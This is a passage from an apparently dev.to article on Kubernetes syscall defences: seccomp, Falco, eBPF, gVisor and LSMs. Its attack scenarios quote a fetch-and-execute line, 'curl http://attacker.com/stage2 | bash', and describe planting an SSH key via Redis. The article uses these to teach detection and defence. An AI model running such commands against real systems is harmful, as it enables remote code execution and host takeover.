&lt;td&gt;Logs the syscall, allows it — useful for audit-mode profiling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_TRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Notifies a &lt;code&gt;ptrace&lt;/code&gt; tracer — used for policy development tooling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sends the event to a user-space supervisor via fd — enables policy agents&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The Kubernetes &lt;code&gt;RuntimeDefault&lt;/code&gt; profile uses &lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt; for disallowed syscalls. Custom profiles can mix actions — kill on &lt;code&gt;ptrace&lt;/code&gt;, log on unknown syscalls during a grace period, and allow everything else.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Analogy:&lt;/strong&gt; seccomp is a bouncer at the kernel's door. Your app can only get in if the syscall is on the guest list.&lt;/p&gt;

&lt;p&gt;Kubernetes exposes this via &lt;code&gt;seccompProfile&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;seccompProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeDefault&lt;/span&gt;   &lt;span class="c1"&gt;# containerd/docker's default profile&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api-server&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;RuntimeDefault&lt;/code&gt; profile blocks ~44 high-risk syscalls including:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Syscall&lt;/th&gt;
&lt;th&gt;Why it's dangerous&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ptrace&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allows one process to inspect/modify another's memory. Classic injection vector.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;clone&lt;/code&gt; (namespace-creating flags only)&lt;/td&gt;
&lt;td&gt;The profile blocks &lt;code&gt;CLONE_NEWUSER&lt;/code&gt; and &lt;code&gt;CLONE_NEWNS&lt;/code&gt; flag combinations — not &lt;code&gt;clone&lt;/code&gt; itself, which many workloads need for thread creation. Namespace-creating variants are the escape vector.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;syslog&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Reads kernel message buffer. Information disclosure.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;perf_event_open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Side-channel attack surface (Spectre-class).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;keyctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Access to kernel keyring. Credential theft.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;bpf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Load eBPF programs. Privilege escalation surface.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;For high-security workloads, &lt;code&gt;RuntimeDefault&lt;/code&gt; isn't enough.&lt;/strong&gt; You want a custom profile scoped to what your specific workload actually calls. Here's the workflow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F436rlv4kbvfgwp4qy25i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F436rlv4kbvfgwp4qy25i.png" alt="image" width="800" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production tip:&lt;/strong&gt; Start with &lt;code&gt;RuntimeDefault&lt;/code&gt;, instrument with Falco to catch EPERM signals, then tighten to a custom profile over one or two release cycles. Don't try to go from zero to custom profile in one shot — you'll break things.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Falco: Syscall-Level Runtime Detection
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt;&lt;/strong&gt; (CNCF project) hooks into the kernel's syscall stream — via a kernel module or an eBPF probe — and evaluates every syscall event against a rule engine in user space.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhyj5ezg1zmis0ha9vev5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhyj5ezg1zmis0ha9vev5.png" alt="image" width="800" height="288"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Falco rules are expressive and context-aware:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;rule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Shell Spawned in Container&lt;/span&gt;
  &lt;span class="na"&gt;desc&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;A shell was spawned in a container that should not run shells&lt;/span&gt;
  &lt;span class="na"&gt;condition&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;spawned_process and&lt;/span&gt;
    &lt;span class="s"&gt;container and&lt;/span&gt;
    &lt;span class="s"&gt;shell_procs and&lt;/span&gt;
    &lt;span class="s"&gt;not proc.pname in (allowed_parents)&lt;/span&gt;
  &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="s"&gt;Shell spawned in container&lt;/span&gt;
    &lt;span class="s"&gt;(pod=%k8s.pod.name ns=%k8s.ns.name&lt;/span&gt;
     &lt;span class="s"&gt;cmd=%proc.cmdline parent=%proc.pname&lt;/span&gt;
     &lt;span class="s"&gt;image=%container.image.repository)&lt;/span&gt;
  &lt;span class="na"&gt;priority&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;CRITICAL&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why Falco catches what application-level monitoring misses:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;All behavior — no matter how sophisticated — eventually becomes syscalls. An attacker who compromises your app and tries to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Read &lt;code&gt;/etc/shadow&lt;/code&gt; → &lt;code&gt;openat()&lt;/code&gt; syscall → Falco sees it&lt;/li&gt;
&lt;li&gt;Exfiltrate data via DNS → &lt;code&gt;socket()&lt;/code&gt; + &lt;code&gt;connect()&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;li&gt;Escalate privileges → &lt;code&gt;setuid()&lt;/code&gt; / &lt;code&gt;clone()&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;li&gt;Download a second-stage payload → &lt;code&gt;execve("curl", ...)&lt;/code&gt; → Falco sees it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No agent in your application code. No SDK to integrate. Pure kernel-level observation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Staff-level consideration:&lt;/strong&gt; Falco's event throughput on a busy node can be high — 100k+ syscall events/sec on a heavily loaded API server node. You need to think about the Falco deployment model (DaemonSet with kernel module vs. eBPF probe), rule cardinality, and alert fatigue suppression from the start. Falco's &lt;strong&gt;modern eBPF probe&lt;/strong&gt; requires kernel ≥5.8 (for BPF ring buffer and BTF/CO-RE support) and has been the &lt;em&gt;default&lt;/em&gt; driver since Falco 0.38.0 — it is bundled directly in the Falco binary, requiring no separate kernel module compilation. In Falco 0.43.0, the &lt;strong&gt;legacy eBPF probe&lt;/strong&gt; (&lt;code&gt;engine.kind=ebpf&lt;/code&gt;) was deprecated (not the kernel module — &lt;code&gt;kmod&lt;/code&gt; remains supported for older kernels). The driver decision tree in production: kernel ≥5.8 → modern eBPF (default, zero driver download); kernel &amp;lt;5.8 → kernel module (&lt;code&gt;kmod&lt;/code&gt;), which requires matching kernel headers and breaks on kernel upgrades.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  eBPF: Programmable Kernel Hooks
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;eBPF&lt;/strong&gt; (extended Berkeley Packet Filter) is one of the most significant additions to the Linux kernel in the last decade. It lets you load sandboxed programs into the kernel that execute at specific hook points — including syscall entry and exit — without modifying kernel source or loading full kernel modules.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsycphg0q6lhq4xdfmz7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsycphg0q6lhq4xdfmz7.png" alt="image" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The verifier is the key safety property: before any eBPF program executes in the kernel, the verifier statically proves it terminates, doesn't access invalid memory, and can't crash the kernel. This gives you programmable kernel instrumentation without the risk of a buggy kernel module taking down the node.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How Kubernetes tooling uses eBPF:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;eBPF Hook&lt;/th&gt;
&lt;th&gt;What it achieves&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://cilium.io/" rel="noopener noreferrer"&gt;Cilium&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;tc&lt;/code&gt;, &lt;code&gt;xdp&lt;/code&gt;, socket hooks&lt;/td&gt;
&lt;td&gt;L3/L4/L7 network policy without iptables&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://tetragon.io/" rel="noopener noreferrer"&gt;Tetragon&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;kprobe&lt;/code&gt;, &lt;code&gt;tracepoint&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Enforce policy at kernel function level (not just syscall boundary)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://px.dev/" rel="noopener noreferrer"&gt;Pixie&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;uprobe&lt;/code&gt; + syscall hooks&lt;/td&gt;
&lt;td&gt;Capture HTTP headers, SQL queries, gRPC frames without app changes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://www.parca.dev/" rel="noopener noreferrer"&gt;Parca&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;perf_event&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Continuous CPU profiling with stack traces&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tracepoint / raw syscall&lt;/td&gt;
&lt;td&gt;Runtime security event stream&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Staff-level insight:&lt;/strong&gt; The shift from iptables/ipvs to eBPF-based networking (Cilium) is not just a performance improvement. It's a security architecture change. With iptables, policy is evaluated at netfilter hooks — after the syscall has returned and the packet is already in the kernel's network stack. With eBPF XDP(eXpress Data Path), you can drop packets before they even DMA(Direct Memory Access) into kernel memory. The enforcement point moves earlier in the execution path.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;XDP (eXpress Data Path) refers to a high-performance packet processing path in the Linux kernel that runs very early in the network stack.&lt;/li&gt;
&lt;li&gt;DMA (Direct Memory Access) is the mechanism that allows network hardware (NIC) to transfer packet data directly into system memory without CPU intervention.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  gVisor: The User-Space Kernel
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://gvisor.dev/" rel="noopener noreferrer"&gt;gVisor&lt;/a&gt;&lt;/strong&gt; takes a fundamentally different approach: instead of filtering which syscalls your container can make, it intercepts &lt;em&gt;all&lt;/em&gt; syscalls and handles them in a user-space kernel called the &lt;strong&gt;&lt;a href="https://github.com/google/gvisor/blob/master/pkg/sentry/kernel/README.md" rel="noopener noreferrer"&gt;Sentry&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftqtih4isilo4zgu5brlc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftqtih4isilo4zgu5brlc.png" alt="image" width="800" height="97"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The Sentry is written in Go and implements the Linux syscall ABI(Application Binary Interface). When your container app calls &lt;code&gt;open()&lt;/code&gt;, the Sentry handles it — checking permissions, managing file descriptors — using only a narrow set of host syscalls to do so. The host kernel's attack surface shrinks from ~450 syscalls to &lt;strong&gt;a few dozen&lt;/strong&gt; host syscalls. Per gVisor's own security documentation, this is in the range of 53–68 depending on whether networking (Netstack) is enabled — but this figure varies by platform and gVisor version. The key invariant: &lt;strong&gt;no syscall is ever passed through directly&lt;/strong&gt;. Each one has an independent implementation inside the Sentry, so even if the Sentry's syscall handling has a bug, the host kernel's full attack surface is never exposed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this is deployed:&lt;/strong&gt; Google Cloud Run and GKE Sandbox use gVisor. If you run untrusted code (user-submitted functions, multi-tenant FaaS), gVisor is the right choice. For trusted first-party workloads, the overhead (10-15% latency increase on I/O-heavy workloads) may not be justified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The tradeoff is explicit:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attack surface reduction = performance cost
More isolation           = more overhead
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;seccomp + eBPF gets you 80% of the protection at ~1% overhead. gVisor gets you 99% protection at 10-15% overhead. Choose based on your threat model.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  LSMs: Mandatory Access Controls
&lt;/h3&gt;

&lt;p&gt;seccomp decides &lt;em&gt;which syscalls&lt;/em&gt; a process can make. &lt;strong&gt;Linux Security Modules (LSMs)&lt;/strong&gt; decide &lt;em&gt;what those syscalls can do&lt;/em&gt; — even after they've been permitted.&lt;/p&gt;

&lt;p&gt;The distinction matters. A container's seccomp profile might allow &lt;code&gt;openat()&lt;/code&gt; (it's fundamental to almost every workload). An LSM then enforces &lt;em&gt;which paths&lt;/em&gt; that &lt;code&gt;openat()&lt;/code&gt; can access. The syscall passes seccomp; the kernel's LSM hook fires before the file is opened; access is denied.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmvib311pzri714j6ezc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmvib311pzri714j6ezc.png" alt="image" width="800" height="845"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three LSMs are relevant in Kubernetes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;LSM&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Kubernetes Usage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://apparmor.net/" rel="noopener noreferrer"&gt;AppArmor&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Path-based profiles — restrict file access, network, capabilities per process&lt;/td&gt;
&lt;td&gt;Default on Ubuntu/Debian nodes; containerd applies profiles per container&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://www.redhat.com/en/topics/linux/what-is-selinux" rel="noopener noreferrer"&gt;SELinux&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Label-based mandatory access control — every process and file has a security context&lt;/td&gt;
&lt;td&gt;Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://landlock.io/" rel="noopener noreferrer"&gt;Landlock&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Unprivileged sandboxing — processes can voluntarily restrict their own file access&lt;/td&gt;
&lt;td&gt;Emerging; available since kernel 5.13; useful for defence-in-depth in application code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why this matters for &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;:&lt;/strong&gt; That exploit required &lt;code&gt;unshare()&lt;/code&gt; and &lt;code&gt;mount()&lt;/code&gt; syscalls. seccomp's &lt;code&gt;RuntimeDefault&lt;/code&gt; profile blocked them. But if you'd been running without seccomp, AppArmor's default container profile would have independently denied the &lt;code&gt;mount&lt;/code&gt; operation. This is defence-in-depth working as intended — two independent layers, either of which alone would have stopped the exploit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Staff-level note:&lt;/strong&gt; AppArmor and SELinux profiles are often set to &lt;code&gt;Unconfined&lt;/code&gt; in practice because they're hard to operationalise at scale. This is the real risk — not that the tools don't work, but that they're disabled. A platform team should treat LSM profile coverage as a first-class metric alongside seccomp adoption.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Scenarios
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scenario 1: The Cryptominer Escape
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What happened:&lt;/strong&gt; An attacker compromised a poorly-configured Redis instance in a container (no auth, exposed port). They:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Used Redis's &lt;code&gt;CONFIG SET dir&lt;/code&gt; and &lt;code&gt;CONFIG SET dbfilename&lt;/code&gt; to write an SSH public key to &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt; on the host — possible because the container ran as root and the host &lt;code&gt;/root&lt;/code&gt; was mounted in.&lt;/li&gt;
&lt;li&gt;SSHd into the host directly.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Syscall trace of the attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;openat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AT_FDCWD&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"/mnt/host-root/.ssh/authorized_keys"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;O_CREAT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"ssh-rsa AAAA..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What would have caught it:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;seccomp:&lt;/strong&gt; A custom profile would not have blocked &lt;code&gt;openat&lt;/code&gt; (it's fundamental), but mounting host paths is a Kubernetes admission controller concern.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Falco rule:&lt;/strong&gt; &lt;code&gt;openat&lt;/code&gt; to a path outside the container's expected directories → alert.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Root cause fix:&lt;/strong&gt; Don't run containers as root. Use &lt;code&gt;runAsNonRoot: true&lt;/code&gt;. Don't mount host paths.&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Scenario 2: The Lateral Movement via &lt;code&gt;execve&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What happened:&lt;/strong&gt; An attacker found an RCE in a Java app. The exploit triggered &lt;code&gt;Runtime.exec("curl http://attacker.com/stage2 | bash")&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Syscall sequence:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;clone()         → fork a child process
execve("bash")  → replace child with bash
execve("curl")  → curl downloads payload
execve("bash")  → execute payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What Falco catches immediately:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Java process (&lt;code&gt;java&lt;/code&gt;) spawning &lt;code&gt;bash&lt;/code&gt; → anomalous parent-child relationship&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;curl&lt;/code&gt; executing from within a container that has no business running &lt;code&gt;curl&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;execve&lt;/code&gt; of any shell from a non-shell expected workload&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What seccomp can do:&lt;/strong&gt; If your Java service has a custom seccomp profile that doesn't include &lt;code&gt;execve&lt;/code&gt; at all (many services never need to fork/exec), the &lt;code&gt;clone()&lt;/code&gt; + &lt;code&gt;execve()&lt;/code&gt; chain is blocked before it starts.&lt;/p&gt;




&lt;h3&gt;
  
  
  Scenario 3: eBPF-Based Zero-Trust Networking
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup:&lt;/strong&gt; You're migrating from an iptables-based CNI to Cilium. The goal is L7-aware network policy.&lt;/p&gt;

&lt;p&gt;Without eBPF, enforcing "Pod A can call &lt;code&gt;/api/users&lt;/code&gt; on Pod B but not &lt;code&gt;/api/admin&lt;/code&gt;" requires an L7 proxy sidecar (Istio/Envoy). Every request goes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's four kernel crossings per request.&lt;/p&gt;

&lt;p&gt;With Cilium's eBPF-based L7 policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two kernel crossings for L3/L4 policy. For L7 (HTTP method/path inspection), Cilium uses a per-node Envoy proxy — not a per-pod sidecar — which is redirected to via eBPF socket hooks. This eliminates the per-pod sidecar overhead while still enabling L7 enforcement. The key distinction: L3/L4 enforcement is entirely in eBPF (zero user-space hops); L7 enforcement redirects through a &lt;em&gt;shared&lt;/em&gt; node-level proxy rather than duplicating a proxy instance per pod.&lt;/p&gt;

&lt;p&gt;The syscall angle: eBPF programs attach to &lt;code&gt;sock_ops&lt;/code&gt; and &lt;code&gt;sk_msg&lt;/code&gt; hooks — fired at socket-level syscall boundaries. Before a TCP connection is fully established or a stream is forwarded, the eBPF program has already made the L3/L4 allow/deny decision, with L7 decisions delegated to the node Envoy.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Implications
&lt;/h2&gt;

&lt;p&gt;Every syscall has a cost. The mode switch from Ring 3 (user mode) to Ring 0 (kernel mode) takes 100–300 nanoseconds on modern hardware — negligible per call, but significant at scale. Two factors in Kubernetes amplify this cost beyond the baseline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The two biggest syscall performance concerns in Kubernetes:&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Meltdown / KPTI Mitigations
&lt;/h3&gt;

